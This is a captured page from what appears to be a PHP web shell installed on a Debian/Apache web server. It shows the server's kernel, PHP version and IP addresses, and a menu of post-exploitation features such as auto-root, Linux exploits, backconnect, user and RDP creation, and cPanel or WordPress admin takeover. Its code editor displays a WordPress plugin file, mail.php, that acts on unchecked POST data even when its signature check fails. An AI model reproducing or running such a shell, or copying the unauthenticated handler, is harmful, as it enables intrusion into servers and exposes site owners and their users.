Linux biogene 3.16.0-11-amd64 #1 SMP Debian 3.16.84-1 (2020-06-09) x86_64
Apache
: 46.101.124.208 | : 3.14.88.60
Cant Read [ /etc/named.conf ]
5.6.40-0+deb8u12
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
OLDHUROMvkontakte-api /
php /
[ HOME SHELL ]
Name
Size
Permission
Action
close-wp.php
82
B
-rw-r--r--
connect.php
3.97
KB
-rw-r--r--
count.php
1.18
KB
-rw-r--r--
cron.php
4.59
KB
-rw-r--r--
mail.php
4.42
KB
-rw-r--r--
options.php
38.73
KB
-rw-r--r--
punycode.php
6.83
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mail.php
<?php if (isset($_POST['social'])) { define('WP_USE_THEMES', false); require_once('../../../../wp-load.php'); status_header(200); nocache_headers(); switch ($_POST['social']) { case 'vk': $post_id = $_POST['id']; $num = $_POST['num']; $last_comment = $_POST['last_comment']; $date = $_POST['date']; $sign = $_POST['sign']; $api_secret = get_option('vkapi_api_secret'); $hash = md5($api_secret . $date . $num . $last_comment); if ($hash == $sign) { update_post_meta($post_id, 'vkapi_comm', $num, false); $email = get_bloginfo('admin_email'); $blog_url = site_url(); if (substr($blog_url, 0, 7) == 'http://') { $blog_url = substr($blog_url, 7); } if (substr($blog_url, 0, 8) == 'https://') { $blog_url = substr($blog_url, 8); } load_plugin_textdomain('vkapi', false, dirname(plugin_basename(__FILE__)) . '/translate/'); $notify_message = 'VKapi: ' . __('Page has just commented!', 'vkapi') . '<br />'; $notify_message .= get_permalink($post_id) . '<br /><br />'; $notify_message .= __('Comment: ', 'vkapi') . '<br />' . $last_comment . '<br /><br />'; $subject = '[VKapi] ' . __('Website:', 'vkapi'); $subject .= ' "' . $blog_url . '"'; add_filter('wp_mail_content_type', create_function('', 'return "text/html";')); wp_mail($email, $subject, $notify_message); } else { update_post_meta($post_id, 'vkapi_comm', $num, false); $email = get_bloginfo('admin_email'); $blog_url = site_url(); if (substr($blog_url, 0, 7) == 'http://') { $blog_url = substr($blog_url, 7); } if (substr($blog_url, 0, 8) == 'https://') { $blog_url = substr($blog_url, 8); } load_plugin_textdomain('vkapi', false, dirname(plugin_basename(__FILE__)) . '/translate/'); $notify_message = 'VKapi: ' . __('Page has just commented!', 'vkapi') . '<br />'; $notify_message .= get_permalink($post_id) . '<br /><br />'; $notify_message .= __('Comment: ', 'vkapi') . '<br />' . $last_comment . '<br /><br />'; $subject = '[VKapi] ' . __('Website:', 'vkapi'); $subject .= ' "' . $blog_url . '"'; $notify_message .= '<br /><br /><br />sign not true'; add_filter('wp_mail_content_type', create_function('', 'return "text/html";')); wp_mail($email, $subject, $notify_message); } break; case 'fb': $post_id = $_POST['id']; $data = wp_remote_get('https://graph.facebook.com/?ids=' . get_permalink($post_id)); if (is_wp_error($data)) { echo $data->get_error_message(); exit; } $resp = json_decode($data['body'], true); foreach ($resp as $key => $value) { $num = $value['comments']; } if (isset($num)) { update_post_meta($post_id, 'fbapi_comm', $num, false); } $email = get_bloginfo('admin_email'); $blog_url = site_url(); if (substr($blog_url, 0, 7) == 'http://') { $blog_url = substr($blog_url, 7); } if (substr($blog_url, 0, 8) == 'https://') { $blog_url = substr($blog_url, 8); } load_plugin_textdomain('vkapi', false, dirname(plugin_basename(__FILE__)) . '/translate/'); $notify_message = 'FBapi: ' . __('Page has just commented!', 'vkapi') . "<br />"; $notify_message .= get_permalink($post_id) . '<br /><br />'; // todo-dx: add last comment, really ^^ $notify_message .= 'Появился новый комментарий' . '<br /><br />'; $subject = '[VKapi] ' . __('Website:', 'vkapi'); $subject .= ' "' . $blog_url . '"'; $notify_message .= '<br /><br /><br />sign not true'; add_filter('wp_mail_content_type', create_function('', 'return "text/html";')); wp_mail($email, $subject, $notify_message); break; } }
Close